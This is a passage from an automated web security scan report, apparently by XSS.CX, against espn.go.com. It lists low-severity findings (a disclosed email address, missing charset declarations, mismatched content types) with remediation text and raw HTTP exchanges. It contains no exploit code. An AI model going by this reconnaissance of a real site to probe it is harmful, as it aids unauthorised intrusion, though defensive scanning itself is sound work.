HTTP/1.1 504 Gateway Timeout Date: Sat, 13 Nov 2010 18:16:02 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Set-Cookie: SWID=CA2AADAB-038D-46B9-A1A1-559A80C611B7; path=/; expires=Sat, 13-Nov-2030 18:16:02 GMT; domain=.go.com; Content-Length: 794 Connection: close X-UA-Compatible: IE=EmulateIE7
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ESPN - Not Fou ...[SNIP]...
The following email address was disclosed in the response:
e60viewers@espn.com
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
Request
GET /espn/e60/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:14:31 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN22 Set-Cookie: SWID=8328CA99-7E19-45D9-B24B-026EDA221BDD; path=/; expires=Sat, 13-Nov-2030 18:14:31 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:13:37 GMT Content-Length: 51354 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:14:31 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="mailto:e60viewers@espn.com"> ...[SNIP]...
10. HTML does not specify charsetpreviousnext There are 3 instances of this issue:
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
GET /mlb/format/design09/index/playerRatingsTopTen HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 17:59:17 GMT Content-Type: text/html Last-Modified: Sat, 13 Nov 2010 17:59:17 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN05 Set-Cookie: SWID=B9CEA655-9A94-4F2F-A70E-460FFB357DF2; path=/; expires=Sat, 13-Nov-2030 17:59:17 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:00:17 GMT Content-Length: 1762 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /mlb/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 17:58:54 GMT Content-Type: text/html Last-Modified: Sat, 13 Nov 2010 17:58:54 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN05 Set-Cookie: SWID=53C7807D-FFC5-42D2-8CF5-D01AEAA1D0B2; path=/; expires=Sat, 13-Nov-2030 17:58:54 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:59:54 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
GET /nhl/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 18:01:24 GMT Content-Type: text/html Last-Modified: Sat, 13 Nov 2010 18:01:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Set-Cookie: SWID=A45895D3-70CF-4BE2-9BFB-72D449C31553; path=/; expires=Sat, 13-Nov-2030 18:01:24 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:02:02 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
<!-- obj null -->
11. Content type incorrectly statedprevious There are 6 instances of this issue:
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
The response contains the following Content-type statement:
Content-Type: text/html; charset=iso-8859-1
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /action/surfing/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 18:16:18 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 18:16:18 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Set-Cookie: SWID=B9DBE756-AA84-49F9-8B28-E4094FD4AD9F; path=/; expires=Sat, 13-Nov-2030 18:16:18 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:24:38 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
The response contains the following Content-type statement:
Content-Type: text/html; charset=iso-8859-1
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /espn/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 18:11:26 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 18:11:26 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN05 Set-Cookie: SWID=0DBA0074-F9E1-4BE9-89D9-4EE91CB4BAF7; path=/; expires=Sat, 13-Nov-2030 18:11:26 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:13:41 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
The response contains the following Content-type statement:
Content-Type: text/html; charset=iso-8859-1
The response states that it contains HTML. However, it actually appears to contain JSON.
Request
GET /espn3/search/indexFeaturedEvents HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:43:39 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:39:07 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Set-Cookie: SWID=06B9ECB3-DAFE-4C19-9ABC-3DE2A1776375; path=/; expires=Sat, 13-Nov-2030 17:43:39 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:47:27 GMT Content-Length: 2527 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
{"featuredEvents":[ {"id":"65908", "name":"Indiana vs. #7 Wisconsin", "eventType":"live", "starttime":"Sat, Nov 13, 12:00 PM", "thumbnail":"http://a.espncdn.com/espn360/images/fb/ncaaf/65908_small.jp ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /mlb/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 17:58:54 GMT Content-Type: text/html Last-Modified: Sat, 13 Nov 2010 17:58:54 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN05 Set-Cookie: SWID=53C7807D-FFC5-42D2-8CF5-D01AEAA1D0B2; path=/; expires=Sat, 13-Nov-2030 17:58:54 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:59:54 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
The response contains the following Content-type statement:
Content-Type: text/html; charset=iso-8859-1
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /nfl/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Date: Sat, 13 Nov 2010 17:55:57 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:08:50 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Set-Cookie: SWID=B8A2F562-3187-44FD-8521-715A53882AA6; path=/; expires=Sat, 13-Nov-2030 17:55:57 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:15:50 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /nhl/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 18:01:24 GMT Content-Type: text/html Last-Modified: Sat, 13 Nov 2010 18:01:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Set-Cookie: SWID=A45895D3-70CF-4BE2-9BFB-72D449C31553; path=/; expires=Sat, 13-Nov-2030 18:01:24 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:02:02 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
<!-- obj null -->
Report generated by XSS.CX at Sat Nov 13 20:15:00 CST 2010.